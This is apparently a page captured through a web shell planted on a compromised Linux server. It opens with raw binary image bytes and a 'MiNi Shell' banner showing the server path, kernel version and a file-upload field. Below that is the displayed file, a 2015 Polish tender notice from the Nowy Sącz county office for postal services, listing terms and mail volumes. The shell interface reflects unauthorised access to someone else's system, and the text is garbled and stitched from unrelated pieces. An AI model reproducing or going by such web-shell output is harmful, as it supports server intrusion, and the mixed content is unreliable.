JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151104/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151104/160441-N-2015.html

<p class="kh_header"><b>Nowy Sącz: ZP.272.32.2015 Zamówienie na usługi pocztowe w obrocie krajowym i zagranicznym dla Starostwa Powiatowego w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych opłacanych i ich ewentualnych zwrotów, w okresie od 02.01.2016 r. do 31.12.2017 r</b><br>
<b>Numer ogłoszenia: 160441 - 2015; data zamieszczenia: 04.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Nowosądecki, Zarząd Powiatu Nowosądeckiego , ul. Jagiellońska 33, 33-300 Nowy Sącz, woj. małopolskie, tel. 18 4141600, faks 18 4141700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowosadecki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP.272.32.2015 Zamówienie na usługi pocztowe w obrocie krajowym i zagranicznym dla Starostwa Powiatowego w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych opłacanych i ich ewentualnych zwrotów, w okresie od 02.01.2016 r. do 31.12.2017 r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Opis przedmiotu zamówienia.

Przedmiotem zamówienia jest świadczenie usług pocztowych w obrocie krajowym i zagranicznym dla Starostwa Powiatowego w Nowym Sączu w zakresie przyjmowania, przemieszczania, doręczania przesyłek pocztowych opłacanych i ich ewentualnych zwrotów.

II. Zakres przedmiotu zamówienia obejmuje:
usługi pocztowe w obrocie krajowym i zagranicznym, opłacane przy użyciu maszyny                          do frankowania Pitney Bowes E 211


III. Przedmiot zamówienia będzie realizowany zgodnie z przepisami powszechnie obowiązującego prawa, w szczególności:

1.	ustawy dnia 23 listopada 2012 r. - Prawo Pocztowe (tekst jednolity Dz. U. z 2012 r., poz.1529) oraz aktów wykonawczych wydanych na jej podstawie.
2.	ustawy z dnia 14 czerwca 1960 r. Kodeks postępowania administracyjnego (tekst jednolity Dz. U. z 2013 r., poz. 267, ze zmianami) regulującej tryb doręczenia pism nadawanych                   w postępowaniu administracyjnym.
3.	Regulaminów Wykonawcy dot. świadczenia usług objętych niniejszym przedmiotem zamówienia.

IV.  Szacunkowe ilości przewidywanych przesyłek i paczek w okresie świadczenia usługi wskazane są w formularzu oferty, stanowiącym załącznik nr 1 do SIWZ.
1.	Ilość przesyłek i paczek jest szacunkowa i służy jedynie orientacyjnemu określeniu wielkości przedmiotu zamówienia. Zamawiający nie gwarantuje w żaden sposób,                        że podane ilości zostaną zrealizowane w okresie trwania umowy i zastrzega sobie prawo do zmiany ilości przesyłek danego rodzaju w każdym czasie. Jednocześnie Zamawiający gwarantuje, iż minimalna kwota, która zostanie zapłacona z tytułu realizacji przedmiotu umowy wyniesie 70% ceny podanej w formularzu oferty. 
2.	Rzeczywiste ilości przesyłek będą wynikać z aktualnych potrzeb Zamawiającego i mogą odbiegać od ilości podanych w formularzu oferty. Wykonawca wyraża zgodę                          na ewentualne zmiany i nie będzie dochodził roszczeń z tytułu zmian ilościowych                           i rodzajowych w trakcie realizacji umowy.
W przypadku nadania przez Zamawiającego innej ilości przesyłek z danej kategorii, usługi te będą rozliczane według cen jednostkowych wynikających z formularza oferty.
3.	Przesyłki niewyszczególnione w załączniku nr 1 do SIWZ będą wyceniane dodatkowo zgodnie z cennikiem  Wykonawcy.


V. Rodzaje przesyłek:
Przez przesyłki pocztowe, będące przedmiotem zamówienia rozumie się :

1. Przesyłki listowe o wadze do 2 000 g (gabaryt A i B) - w obrocie krajowym
a)	zwykłe ekonomiczne - przesyłki nierejestrowane niebędące przesyłkami najszybszej kategorii,
b)	zwykłe priorytetowe - przesyłki nierejestrowane najszybszej kategorii,
c)	polecone ekonomiczne - przesyłki rejestrowane niebędące przesyłkami najszybszej kategorii,
d)	polecone priorytetowe - przesyłki rejestrowane najszybszej kategorii,
e)	polecone za zwrotnym potwierdzeniem odbioru (ZPO) - przesyłki niebędące przesyłkami najszybszej kategorii przyjęte za potwierdzeniem nadania i doręczone za pokwitowaniem odbioru,
f)	polecone priorytetowe za zwrotnym potwierdzeniem odbioru (ZPO) - przesyłki najszybszej kategorii przyjęte za potwierdzeniem nadania i doręczone za pokwitowaniem odbioru.

2. Paczki pocztowe o wadze do 10 000 g (gabaryt A i B) - w obrocie krajowym
a)	paczki ekonomiczne - paczki rejestrowane niebędące paczkami najszybszej kategorii,
b)	paczki priorytetowe -  paczki rejestrowane najszybszej kategorii,
c)	paczki ekonomiczne za zwrotnym potwierdzeniem odbioru (ZPO) - paczki rejestrowane ekonomiczne przyjęte za potwierdzeniem nadania i doręczane za pokwitowaniem odbioru.

3. Przesyłki listowe - w obrocie zagranicznym (obszar Europy i poza Europą):
a)	przesyłki zwykłe priorytetowe - przesyłki nierejestrowane najszybszej kategorii,
b)	przesyłki polecone priorytetowe - przesyłki rejestrowane najszybszej kategorii,
c)	przesyłki polecone priorytetowe za zwrotnym potwierdzeniem odbioru (ZPO) - przesyłki najszybszej kategorii przyjęte za potwierdzeniem nadania i doręczone                                    za pokwitowaniem odbioru.

4. Paczki pocztowe - w obrocie zagranicznym (obszar Europy i poza Europą):
-	paczki pocztowe priorytetowe o wadze do 5 000 g

Wymiary (gabaryty) przesyłek listowych: 
gabaryt A - przesyłki o wymiarach: 
- minimum: wymiary strony adresowej nie mogą być mniejsze niż 90 mm x 140 mm 
- maksimum: żaden z wymiarów nie może przekroczyć: wysokość 20 mm, długość 325 mm, szerokość 230 mm; 
gabaryt B - przesyłki o wymiarach: 
- minimum: jeśli choć jeden z wymiarów przekracza wysokość 20 mm lub długość 325 mm lub szerokość 230 mm,
- maksimum: suma długości, szerokości i wysokości (grubości) 900 mm, przy czym największy z tych wymiarów (długość) nie może przekroczyć 600 mm. 
Przyjmuje się tolerancje wszystkich wymiarów 2 mm. 

Wymiary (gabaryty) paczek: 
gabaryt A - paczka o wymiarach: 
- minimum: wymiary strony adresowej nie mogą być mniejsze niż 90 mm x 140 mm 
- maksimum: żaden z wymiarów nie może przekroczyć: wysokość 300 mm, długość 600 mm, szerokość 500 mm; 
gabaryt B - paczka o wymiarach: 
- minimum: jeśli choć jeden z wymiarów przekracza wysokość 300 mm, długość 600 mm lub szerokość 500 mm,
- maksimum: suma długości i największego obwodu mierzonego w innym kierunku niż długość - 3000 mm, przy czym największy wymiar nie może przekroczyć 1500 mm. 

VI. Ceny zawierają wszelkie podatki, opłaty i koszty Wykonawcy związane z realizacją zamówienia. 
Ceny jednostkowe podane przez Wykonawcę nie będą podlegały zmianom i są stałe przez cały okres realizacji zamówienia, z poniższymi wyjątkami:
1.	W przypadku zmiany stawki podatku VAT na usługi pocztowe może nastąpić zmiana cen jednostkowych odpowiednio do stawki podatku. Jeżeli w trakcie obowiązywania umowy nastąpi zmiana w zakresie podatku od towarów i usług Zamawiający, po uprzednim pisemnym zawiadomieniu ze strony Wykonawcy o zaistnieniu tego zdarzenia, zobowiązuje się do uiszczenia opłaty powiększonej o podatek od towarów i usług według stawki obowiązującej w dniu wystawienia faktury/rachunku.
2.	Ceny określone przez Wykonawcę w ofercie ulegną obniżeniu w toku realizacji zamówienia w przypadku, gdy opłaty pocztowe wynikające ze standardowego cennika lub regulaminu Wykonawcy będą niższe od cen zawartych w przedłożonej ofercie. Wykonawca ma obowiązek wówczas stosować względem Zamawiającego obniżone opłaty pocztowe dla usług, wynikające ze swojego aktualnego cennika lub regulaminu.
3.	Zamawiającemu przysługuje możliwość korzystania z programów rabatowych (opustowych) oferowanych przez Wykonawcę w toku realizowanej umowy tak co ceny konkretnego rodzaju przesyłki, gabarytu jak i upustów od całości wartości miesięcznej faktury/rachunku.
4.	Wynagrodzenie należne Wykonawcy może ulec zmianie w stosunku do oferty Wykonawcy w przypadkach określonych w art. 142 ust. 5 ustawy Prawo zamówień publicznych jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. Zmiana wynagrodzenia może nastąpić wyłącznie po akceptacji obu stron umowy i musi mieć formę pisemnego aneksu do umowy.

     

VII. Zasady wnoszenia opłat za świadczenia usług pocztowych:

1.	Opłaty za przesyłki nadane w obrocie krajowym i zagranicznym będą uiszczane maszyną do frankowania.

2.	Rozliczenie usług pocztowych odbywać się będzie przelewem na konto wskazane przez Wykonawcę. Wysokość wpłat ustala Zamawiający w zależności od posiadanych środków finansowych. Po otrzymaniu wpłaty Wykonawca wystawi niezwłocznie Zamawiającemu fakturę/rachunek odpowiadającą wysokości przekazanych środków.
Wykonawca umożliwi ustawienie licznika urządzenia do frankowania, odpowiednio                   do wysokości wpłaty od dnia dokonania wpłaty tj. w dniu uznania rachunku bankowego Wykonawcy. Nastawienie maszyn musi odbywać się na terenie miasta Nowy Sącz.

3.	Podstawą obliczenia należności będzie suma opłat za przesyłki faktycznie nadane                    lub zwrócone z powodu braku możliwości ich doręczenia w okresie rozliczeniowym miesięcznym, potwierdzona co do ilości i wagi na podstawie dokumentów nadawczych               lub oddawczych, przy czym obowiązywać będą ceny jednostkowe podane w formularzu oferty, stanowiącym załącznik nr 1 do SIWZ. W terminie 7 dni od zakończenia każdego miesiąca rozliczeniowego, Wykonawca przekaże Zamawiającemu zestawienie dokumentujące wartość faktycznie zrealizowanych usług pocztowych na rzecz Zamawiającego w tym okresie rozliczeniowym.

4.	Ceny określone w formularzu oferty stanowiącym załącznik nr 1 do SIWZ powinny zawierać wszelkie podatki, opłaty i koszty Wykonawcy związane z realizacją zamówienia.


VIII. Obowiązki Zamawiającego: 

1.	Opakowanie przesyłek listowych i paczek w sposób umożliwiający Wykonawcy doręczanie bez ubytku i uszkodzenia do miejsca zgodnie z adresem przeznaczenia. Opakowanie przesyłek listowych stanowi zaklejona koperta Zamawiającego, opakowanie paczki stanowi sztywne pudełko lub szary papier Zamawiającego (waga przesyłki określona będzie w stanie zamkniętym). Zamawiający nie dopuszcza stosowania przez Wykonawcę własnych opakowań na dostarczane przesyłki.
2.	Umieszczanie na przesyłce listowej lub paczce w sposób czytelny nazwy odbiorcy                  wraz z jego adresem (podany jednocześnie w książce nadawczej dla przesyłek rejestrowanych), określenie rodzaju przesyłki (zwykła polecona, priorytet czy ze zwrotnym potwierdzeniem odbioru), pieczątki (nadruku) określającej pełną nazwę i adres Zamawiającego oraz w miejscu przeznaczonym na opłatę, napisu (nadruku) lub odcisku pieczęci o treści wskazanej przez Wykonawcę.
3.	Nadawanie przesyłek w stanie uporządkowanym, wg specyfikacji,  przez co należy rozumieć: 
-	Sporządzenie w dwóch egzemplarzach dziennego zestawienia ilościowo - wartościowego wszystkich nadanych przesyłek rejestrowanych i nierejestrowanych, z uwzględnieniem ceny, kategorii i podziałów wagowych. Oryginał zestawienia będzie przeznaczony dla Wykonawcy w celach rozliczeniowych, a kopia stanowić będzie dla Zamawiającego potwierdzenie nadania danej partii przesyłek.
-	Dla przesyłek rejestrowanych - sporządzenie  i wydruk książki nadawczej. Oryginalne strony książki nadawczej będą przeznaczone dla Wykonawcy w celach rozliczeniowych, a kopie stanowić będą dla Zamawiającego potwierdzenie nadanej partii przesyłek.
4.	Zamawiający we własnym zakresie ponosić będzie koszty eksploatacji, konserwacji                      i czynności serwisowych maszyny frankującej.


IX. Obowiązki Wykonawcy:

1.	Zamawiający wymaga, aby Wykonawca dysponował placówką nadawczą w miejscowości, w której znajduje się siedziba Zamawiającego tj. w Nowym Sączu.
2.	Wykonawca winien zapewnić możliwość dokonywania ewentualnych zwrotów                         oraz nadawania wszystkich przesyłek objętych przedmiotem niniejszego zamówienia, w placówce nadawczej Wykonawcy czynnej od poniedziałku do piątku w godzinach                    co najmniej od 8:00 do 19:00 usytuowanej na terenie miasta Nowego Sącza.
W przypadku gdy placówka (oddział) Wykonawcy uprawniona od obioru przesyłek będzie mieściła się w odległości nie większej niż 1 kilometr od siedziby głównej Starostwa Powiatowego w Nowym Sączu mieszczącej się przy ul. Jagiellońskiej 33 - Zamawiający będzie osobiście dostarczał przesyłki do placówki (oddziału) Wykonawcy poprzez swoich pracowników. 
Jeżeli w/w odległość będzie przekraczać jeden kilometr Wykonawca będzie zobowiązany do codziennego odbioru przesyłek (oraz do dokonywania ewentualnych zwrotów) bezpośrednio z dziennika podawczego mieszczącego się w głównej siedzibie Starostwa Powiatowego w Nowym Sączu ul. Jagiellońska 33 poprzez własnych pracowników bez pobierania z tego tytułu opłat.
W takim przypadku:
-	zwrot do siedziby Zamawiającego otrzymanych książek nadawczych, zestawienia nadanych przesyłek, niedoręczonych przesyłek pocztowych oraz zwrotnych potwierdzeń odbioru  musi następować w dniu następnym do godz.10:00
-	odbiór przesyłek musi następować raz dziennie (od poniedziałku do piątku) w godzinach od 14:45 do 15:00
-	jeżeli Zamawiający nie będzie mógł nadać przesyłek w w/w godzinach (czasie) lub zajdzie konieczność wysłania dodatkowej korespondencji Zamawiający osobiście, przez swoich pracowników, dostarczy przesyłki do najbliższej placówki (oddziału) Wykonawcy czynnej co najmniej do godziny 19:00
3.	Przesyłki nadawane przez Zamawiającego dostarczane będą przez Wykonawcę do każdego miejsca w kraju i zagranicą.
4.	Wykonawca ma obowiązek potwierdzania każdorazowo przyjętych do wyekspediowania w kraju i zagranicę przesyłek  - pieczęcią, podpisem i datą na dziennym zestawieniu ilościowo - wartościowym wszystkich nadanych przesyłek rejestrowanych                                     i nierejestrowanych oraz w książce nadawczej (dla przesyłek rejestrowanych).
5.	Niedopuszczalne jest nieuzasadnione przetrzymywanie przesyłek przez Wykonawcę.
6.	Nadanie przesyłek, w przypadku braku zastrzeżeń, musi nastąpić w dniu ich odbioru                 przez Wykonawcę od  Zamawiającego.
7.	W razie braku możliwości dostarczenia korespondencji do adresata, po upływie obowiązującego terminu przesyłka zwracana jest Zamawiającemu wraz z podaniem przyczyny jej niedoręczenia.
8.	Wykonawca będzie zwracał do Zamawiającego potwierdzenie odbioru przesyłki (ZPO) niezwłocznie po dokonaniu doręczenia przesyłki nie później jednak niż 14 dni od dnia potwierdzenia odbioru przesyłki.
9.	W przypadku uszkodzenia przesyłki Wykonawca ma obowiązek ją zabezpieczyć                         oraz nanieść adnotację z informacją o osobie dokonującej zabezpieczenia.
10.	Zamawiający nie dopuszcza sytuacji, w której część przesyłek zostanie nadana przez inny podmiot na rzecz i w imieniu Zamawiającego, w wyniku czego na dowodzie nadania  przesyłki będzie figurować inny podmiot niż Zamawiający.
11.	Zamawiający nie dopuszcza możliwości by na kopercie oprócz danych wskazanych przez Zamawiającego znajdowały się informacje o opłacie za usługę pocztową związane                         ze świadczeniem części zamówienia przez podwykonawców oraz inne ewentualne uwagi dotyczące obiegu przesyłki pocztowej.
12.	Wykonawca ponosi koszty dostosowania części drukującej (matrycy), która zawiera znak opłaty oraz datownik wg obowiązującego wzoru, z numerem identyfikacyjnym urządzenia frankującego i nazwą placówki nadawczej Wykonawcy dla maszyny frankującej.
13.	 Zamawiający oczekuje, że Wykonawca przeprogramuje maszynę do frankowania w takim czasie aby nadawanie korespondencji było możliwe od dnia 2 stycznia 2016 r.  tj. od dnia obowiązywania umowy.
14.	W przypadku niemożliwości realizacji usługi za pomocą maszyny do frankowania                    (np. awaria, długotrwały brak energii elektrycznej itp.) Wykonawca wyraża zgodę,                      a Zamawiający zobowiązuje się do umieszczania na przesyłkach kodów nadawczych              oraz oznaczenia potwierdzającego wniesienie opłaty za usługę w postaci napisu, nadruku lub odcisku pieczęci o treści uzgodnionej z Wykonawcą.

X. Reklamacje i odszkodowania
1.	Usługę pocztową w zakresie przesyłki rejestrowanej uważa się za niewykonaną, jeżeli doręczenie przesyłki rejestrowanej lub zawiadomienie o próbie jej doręczenia nie nastąpiło w terminie 14 dni od dnia nadania.
2.	Reklamacje z tytułu niewykonania usługi Zamawiający może zgłosić do Wykonawcy                 po upływie 14 dni od nadania przesyłki rejestrowanej, nie później jednak niż 12 miesięcy    od dnia ich nadania. Termin udzielenia odpowiedzi na reklamację nie może przekroczyć 30 dni od dnia otrzymania reklamacji. 
3.	Do odpowiedzialności Wykonawcy za nienależyte wykonanie usługi pocztowej stosuje się odpowiednio przepisy ustawy Prawo Pocztowe oraz aktów wykonawczych wydanych na jej podstawie, a w sprawach nieuregulowanych tymi przepisami stosuje się odpowiednio przepisy Kodeksu Cywilnego.
4.	Wykonawca odpowiada za niewykonanie lub nienależyte wykonanie usługi pocztowej chyba, że nastąpiło to wskutek siły wyższej niezależnej od Wykonawcy i niemożliwej                  do przewidzenia.
5.	Z tytułu niewykonania lub nienależytego wykonania usługi stanowiącej przedmiot zamówienia, w tym utraty, ubytku lub uszkodzenia przesyłki, Zamawiającemu przysługuje odszkodowanie oraz inne roszczenia na zasadach i w wysokości określonych w ustawie Prawo Pocztowe oraz zgodnie z regulaminami poszczególnych usług Wykonawcy.


Szacunkowa liczba przesyłek planowanych do nadania w okresie od 02.01.2016 r. do 31.12.2017 r. 

Lp./rodzaj przesyłki/waga przesyłki/gabaryt/szacunkowa liczba przesyłek
1. Przesyłki zwykłe ekonomiczne - przesyłki nierejestrowane, niebędące przesyłkami najszybszej kategorii, w obrocie krajowym: do 350g	A	50000 szt.,
		do 350 g	B	400 szt.,
		do 1000 g	A	20 szt.,
		do 1000 g	B	80 szt.,
		do 2000 g	A	1 szt.,
		do 2000 g	B	1 szt.


2. Przesyłki zwykłe priorytetowe - przesyłki nierejestrowane, najszybszej kategorii w obrocie krajowym:	do 350g	A	2600  szt.,
		do 350 g	B	80 szt.,
		do 1000 g	A	10 szt.,
		do 1000 g	B	20 szt.,
		do 2000 g	A	1 szt.,
		do 2000 g	B	1 szt.,


3. Przesyłki polecone ekonomiczne - przesyłki rejestrowane, niebędące przesyłkami najszybszej kategorii w obrocie krajowym:	do 350g	A	3200 szt.,
		do 350 g	B	40 szt.,
		do 1000 g	A	10 szt.,
		do 1000 g	B	10 szt.,
		do 2000 g	A	1 szt.,
		do 2000 g	B	1 szt.

4. Przesyłki polecone priorytetowe - przesyłki rejestrowane najszybszej kategorii w obrocie krajowym:	do 350g	A	160 szt.,
		do 350 g	B	10 szt.,
		do 1000 g	A	1 szt.,
		do 1000 g	B	1 szt.,
		do 2000 g	A	1 szt.,
		do 2000 g	B	1 szt.
5. Przesyłki polecone ekonomiczne za zwrotnym potwierdzeniem odbioru (ZPO)  -  przesyłki niebędące przesyłkami najszybszej kategorii przyjęte za potwierdzeniem nadania i doręczone za pokwitowaniem odbioru w obrocie krajowym:	do 350g	A	70000 szt.,
		do 350 g	B	900 szt.,
		do 1000 g	A	80 szt.,
		do 1000 g	B	400 szt.,
		do 2000 g	A	20 szt.,
		do 2000 g	B	60 szt.

6. Przesyłki polecone priorytetowe za zwrotnym potwierdzeniem odbioru (ZPO)  -  przesyłki będące przesyłkami najszybszej kategorii przyjęte za potwierdzeniem nadania i doręczone za pokwitowaniem odbioru w obrocie krajowym:	do 350g	A	4000 szt.,
		do 350 g	B	400 szt.,
		do 1000 g	A	1 szt.,
		do 1000 g	B	80 szt.,
		do 2000 g	A	1 szt.,
		do 2000 g	B	1 szt.
Przesyłki zagraniczne:
7. Przesyłki zwykłe priorytetowe - przesyłki nierejestrowane najszybszej kategorii w obrocie zagranicznym 
(obszar  Europy):  	do 50g	20 szt.,
		ponad 50 g do 100 g	1 szt.,
		ponad 100 g do 350 g	1 szt.,
		ponad 350 g do 500 g	1 szt.,
		ponad 500 g do 1000 g	1 szt.,
		ponad 1000 g do 2000 g	1 szt.

8. Przesyłki zwykłe priorytetowe - przesyłki nierejestrowane najszybszej kategorii w obrocie zagranicznym (obszar  poza Europą):	do 50g	1 szt.,
		ponad 50 g do 100 g	1 szt.,
		ponad 100 g do 350 g	1 szt.,
		ponad 350 g do 500 g	1 szt.,
		ponad 500 g do 1000 g	1 szt.,
		ponad 1000 g do 2000 g	1 szt.
9. Przesyłki polecone priorytetowe -  przesyłki rejestrowane najszybszej kategorii w obrocie zagranicznym 
(obszar Europy):	do 50g	40 szt.,
		ponad 50 g do 100 g	1 szt.,
		ponad 100 g do 350 g	1 szt.,
		ponad 350 g do 500 g	1 szt.,
		ponad 500 g do 1000 g	1 szt.,
		ponad 1000 g do 2000 g	1 szt.,

10. Przesyłki polecone priorytetowe -  przesyłki rejestrowane najszybszej kategorii w obrocie zagranicznym 
(obszar poza Europą):	do 50g	1 szt.,
		ponad 50 g do 100 g	1 szt.,
		ponad 100 g do 350 g	1 szt.,
		ponad 350 g do 500 g	1 szt.,
		ponad 500 g do 1000 g	1 szt.,
		ponad 1000 g do 2000 g	1 szt.
11. Przesyłki polecone priorytetowe za  zwrotnym potwierdzeniem odbioru (ZPO)  -  przesyłki będące przesyłkami najszybszej kategorii przyjęte za potwierdzeniem nadania i doręczone za pokwitowaniem odbioru kategorii w obrocie zagranicznym 
(obszar Europy): 	do 50g	40 szt.,
		ponad 50 g do 100 g	1 szt.,
		ponad 100 g do 350 g	1 szt.,
		ponad 350 g do 500 g	1 szt.,
		ponad 500 g do 1000 g	1 szt.,
		ponad 1000 g do 2000 g	1 szt.
12. Przesyłki polecone priorytetowe za  zwrotnym potwierdzeniem odbioru (ZPO)  -  przesyłki będące przesyłkami najszybszej kategorii przyjęte za potwierdzeniem nadania i doręczone za pokwitowaniem odbioru kategorii w obrocie zagranicznym (obszar poza  Europą):	do 50g	1 szt.,
		ponad 50 g do 100 g	1 szt.,
		ponad 100 g do 350 g	1 szt.,
		ponad 350 g do 500 g	1 szt.,
		ponad 500 g do 1000 g	1 szt.,
		ponad 1000 g do 2000 g	1 szt.

Paczki pocztowe - krajowe:
13. paczki ekonomiczne: 
	od 2 kg do 5 kg	A	1 szt.,
		od 2 kg do 5 kg	B	1 szt.,
		od  5 kg do 10 kg	A	1 szt.,
		od  5 kg do 10 kg	B	1 szt.
14. paczki priorytetowe: 
	od 2 kg do 5 kg	A	1 szt.,
		od 2 kg do 5 kg	B	1 szt.,
		od 5 kg do 10 kg	A	1 szt.,
		od 5 kg do 10 kg	B	1 szt.
15. paczki ekonomiczne za zwrotnym potwierdzeniem odbioru (ZPO):
	od 2 kg do 5 kg	A	1 szt.,
		od 2 kg do 5 kg	B	1 szt.,
		od 5 kg do 10 kg	A	1 szt.,
		od 5 kg do 10 kg	B	1 szt.

Paczki pocztowe - zagraniczne:

16. paczki priorytetowe 
(obszar Europy): 	od 2 kg do 3 kg	1 szt.,
		od 3 kg do 4 kg	1 szt.,
		od 4 kg do 5 kg	1 szt.
17. paczki priorytetowe
(obszar poza Europą):	od 2 kg do 3 kg	1 szt.,
		od 3 kg do 4 kg	1 szt.,
		od 4 kg do 5 kg	1 szt.

Opłata za zwroty przesyłek rejestrowanych - w obrocie krajowym i zagranicznym:

18.Usługa zwrot przesyłki poleconej ekonomicznej do siedziby zamawiającego 
- w obrocie krajowym:	do 350g	A	20 szt.,
		do 350 g	B	1 szt.,
		do 1000 g	A	1 szt.,
		do 1000 g	B	1 szt.,
		do 2000 g	A	1 szt.,
		do 2000 g	B	1 szt.
